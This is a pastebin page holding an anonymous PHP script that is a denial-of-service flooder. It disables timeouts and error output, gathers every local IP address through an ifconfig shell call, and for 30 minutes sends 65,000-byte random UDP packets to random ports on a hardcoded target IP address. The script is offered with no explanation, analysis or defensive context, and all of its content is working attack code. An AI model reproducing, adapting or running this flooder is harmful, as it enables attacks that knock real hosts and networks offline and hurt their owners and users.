PasteSite is open to the public, but with limited features. Register to be able to modify access rights, track your pastes and more...
If you prefer reading light text on a dark background to dark text on a light background, then you might want to try the dark theme.
"Untitled" by Anonymous [Plain Text]Actions: |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
ignore_user_abort(TRUE);
set_time_limit(0);
error_reporting(0);
$ip = '212.74.233.43';
$mins = 30;
$psize = 65000;
$secs = $mins*60;
$out='';
for($i=0;$i<$psize;$i++) $out.= chr(mt_rand(1,256));
$timei = time();
$i = 0;
while (1) {
@system('ifconfig | grep -i "inet" > /tmp/bind33');
$fpop = file_get_contents('/tmp/bind33');
$fpop = preg_replace("#\t#", '', $fpop);
$fpip = explode("\n", $fpop);
foreach($fpip as $line) {
$line = explode(" ", $line);
$line = $line[1];
if(preg_match("#^[0-9]#", $line)&&!preg_match("#\:#", $line)) {
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_UDP);
socket_bind($sock, $line);
socket_connect($sock, $ip, mt_rand(1,65000));
socket_write($sock, $out);
socket_close($socket);
}
@$fp = fsockopen("udp://".$ip, mt_rand(1,65000), $errno, $errstr, 1);
if($fp) {
fwrite($fp, $out);
fclose($fp);
}
}
$i++;
if($i > 5000) {
if (time() - $timei > $secs) exit();
else $i = 0;
}
}
exit();
?>
|